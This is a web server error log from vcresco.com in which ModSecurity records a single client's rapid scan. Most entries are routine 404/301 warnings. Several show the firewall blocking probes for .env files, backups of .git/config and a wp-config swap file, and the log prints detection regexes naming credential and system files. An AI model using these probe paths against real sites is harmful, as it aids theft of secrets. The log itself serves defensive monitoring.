[Tue May 26 13:03:58.672902 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79HAAAADE"]
[Tue May 26 13:03:58.673597 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79HQAAAFY"]
[Tue May 26 13:03:58.681841 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79HgAAACE"]
[Tue May 26 13:03:58.699428 2026] [security2:error] [pid 470766:tid 470786] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.bak"] [unique_id "ahVM5ujO_W1DqEcFHQ79KAAAJRM"]
[Tue May 26 13:03:58.700849 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79IQAAAAA"]
[Tue May 26 13:03:58.709478 2026] [security2:error] [pid 470766:tid 470792] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.old"] [unique_id "ahVM5ujO_W1DqEcFHQ79KQAAJRk"]
[Tue May 26 13:03:58.742455 2026] [security2:error] [pid 470766:tid 470781] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config~"] [unique_id "ahVM5ujO_W1DqEcFHQ79KgAAKw4"]
[Tue May 26 13:03:58.799497 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79NgAAAGM"]
[Tue May 26 13:03:58.800107 2026] [security2:error] [pid 470766:tid 470903] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79OAAAAAc"]
[Tue May 26 13:03:58.802653 2026] [security2:error] [pid 470766:tid 470984] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79PQAAAFg"]
[Tue May 26 13:03:58.803447 2026] [security2:error] [pid 470766:tid 470951] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79PwAAADc"]
[Tue May 26 13:03:58.806768 2026] [security2:error] [pid 470766:tid 470990] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79OQAAAF4"]
[Tue May 26 13:03:58.807588 2026] [security2:error] [pid 470766:tid 470949] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79PAAAADU"]
[Tue May 26 13:03:58.860272 2026] [security2:error] [pid 470766:tid 470917] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79TAAAABU"]
[Tue May 26 13:03:58.860723 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79SwAAACw"]
[Tue May 26 13:03:58.863537 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79UAAAAFQ"]
[Tue May 26 13:03:58.866522 2026] [security2:error] [pid 470766:tid 470927] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79TgAAAB8"]
[Tue May 26 13:03:58.869352 2026] [security2:error] [pid 470766:tid 470911] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79TQAAAA8"]
[Tue May 26 13:03:58.872524 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79UQAAAFI"]
[Tue May 26 13:03:58.899917 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79WAAAAEE"]
[Tue May 26 13:03:58.901913 2026] [security2:error] [pid 470766:tid 470942] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79VwAAAC4"]
[Tue May 26 13:03:58.907964 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79WgAAAGk"]
[Tue May 26 13:03:58.935996 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79XgAAAG8"]
[Tue May 26 13:03:59.014406 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79bQAAAG0"]
[Tue May 26 13:03:59.021749 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79awAAACE"]
[Tue May 26 13:03:59.028260 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79cAAAAAA"]
[Tue May 26 13:03:59.029160 2026] [security2:error] [pid 470766:tid 470963] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79bAAAAEM"]
[Tue May 26 13:03:59.056769 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79fAAAAEs"]
[Tue May 26 13:03:59.059976 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79fwAAAH8"]
[Tue May 26 13:03:59.060401 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79gAAAABc"]
[Tue May 26 13:03:59.060463 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79cwAAABM"]
[Tue May 26 13:03:59.064494 2026] [security2:error] [pid 470766:tid 471010] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79dAAAAHI"]
[Tue May 26 13:03:59.071745 2026] [security2:error] [pid 470766:tid 470957] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79fgAAAD0"]
[Tue May 26 13:03:59.075278 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79ggAAAEk"]
[Tue May 26 13:03:59.097410 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79hwAAAC8"]
[Tue May 26 13:03:59.105037 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79igAAAGc"]
[Tue May 26 13:03:59.109301 2026] [security2:error] [pid 470766:tid 470913] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79iwAAABE"]
[Tue May 26 13:03:59.124517 2026] [security2:error] [pid 470766:tid 470972] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79kQAAAEw"]
[Tue May 26 13:03:59.139415 2026] [security2:error] [pid 470766:tid 470914] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79kAAAABI"]
[Tue May 26 13:03:59.273317 2026] [security2:error] [pid 470766:tid 470920] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79oQAAABg"]
[Tue May 26 13:03:59.278971 2026] [autoindex:error] [pid 470766:tid 470945] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/vcress4h/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:59.293397 2026] [security2:error] [pid 470766:tid 470936] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79ogAAACg"]
[Tue May 26 13:03:59.293496 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79pAAAAEo"]
[Tue May 26 13:03:59.301637 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79rwAAAD4"]
[Tue May 26 13:03:59.306167 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79swAAUDQ"]
[Tue May 26 13:03:59.308358 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79sQAAAEA"]
[Tue May 26 13:03:59.312009 2026] [security2:error] [pid 470766:tid 470937] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79tgAAACk"]
[Tue May 26 13:03:59.312167 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79tAAAAE8"]
[Tue May 26 13:03:59.313558 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79owAAAEE"]
[Tue May 26 13:03:59.318812 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79sgAAAGk"]
[Tue May 26 13:03:59.336150 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79uAAAAGg"]
[Tue May 26 13:03:59.336170 2026] [security2:error] [pid 470766:tid 470955] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79wgAAADs"]
[Tue May 26 13:03:59.337847 2026] [security2:error] [pid 470766:tid 470933] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79xgAAACU"]
[Tue May 26 13:03:59.338187 2026] [security2:error] [pid 470766:tid 470973] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79vgAAAE0"]
[Tue May 26 13:03:59.346587 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79ygAAACE"]
[Tue May 26 13:03:59.425663 2026] [security2:error] [pid 470766:tid 470807] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVM5-jO_W1DqEcFHQ790gAADCg"]
[Tue May 26 13:03:59.451152 2026] [security2:error] [pid 470766:tid 470891] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/ADMIN/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ792wAADHw"]
[Tue May 26 13:03:59.463842 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ791QAAABQ"]
[Tue May 26 13:03:59.465498 2026] [security2:error] [pid 470766:tid 470767] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/API/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ795AAADAA"]
[Tue May 26 13:03:59.487174 2026] [security2:error] [pid 470766:tid 470880] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/Api/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ797AAADHE"]
[Tue May 26 13:03:59.487395 2026] [security2:error] [pid 470766:tid 470890] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/APP/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ796gAADHs"]
[Tue May 26 13:03:59.493048 2026] [security2:error] [pid 470766:tid 470894] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/BACK/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ797QAADH8"]
[Tue May 26 13:03:59.499569 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ794gAAAEk"]
[Tue May 26 13:03:59.513652 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ795QAADDg"]
[Tue May 26 13:03:59.513773 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ795wAADDo"]
[Tue May 26 13:03:59.519703 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ795gAADDk"]
[Tue May 26 13:03:59.520954 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ796QAADEk"]
